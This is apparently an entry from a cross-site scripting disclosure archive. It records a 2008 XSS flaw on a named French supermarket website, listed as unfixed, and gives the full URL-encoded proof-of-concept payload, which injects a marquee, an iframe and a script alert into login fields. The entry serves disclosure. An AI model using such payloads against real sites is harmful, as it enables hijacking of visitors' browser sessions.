Security researcher death-angel, has submitted on 06/10/2008 a cross-site-scripting (XSS) vulnerability affecting www.supermarchesmatch.fr, which at the time of submission ranked 696667 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/10/2008 |
Date published: 12/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: death-angel |
Domain: www.supermarchesmatch.fr |
Category: XSS |
Pagerank: 696667 |
URL: http://www.supermarchesmatch.fr/Match/HTML/Site/comptenew.php?act=identnew&univers=9&page_provenance =&id_annonce=&id_recette=&id_produit=&id_page=&login_ident=%22%2F%3E%3Cmarquee%3Exss+death-angel%3Ci frame+src%3D%22http%3A%2F%2Fwww.xssed.com%22+height%3D%221500%22+width%3D%221100%22%2F%3E%3Cscript%3 Ealert(0)%3B%3C%2Fscript%3E&image.x=27&image.y=16&mdp_ident=%22%2F%3E%3Cmarquee%3Exss+death-angel%3C iframe+src%3D%22http%3A%2F%2Fwww.xssed.com%22+height%3D%221500%22+width%3D%221100%22%2F%3E%3Cscript% 3Ealert(0)%3B%3C%2Fscript%3E |
Click here to view the mirror
|
|
|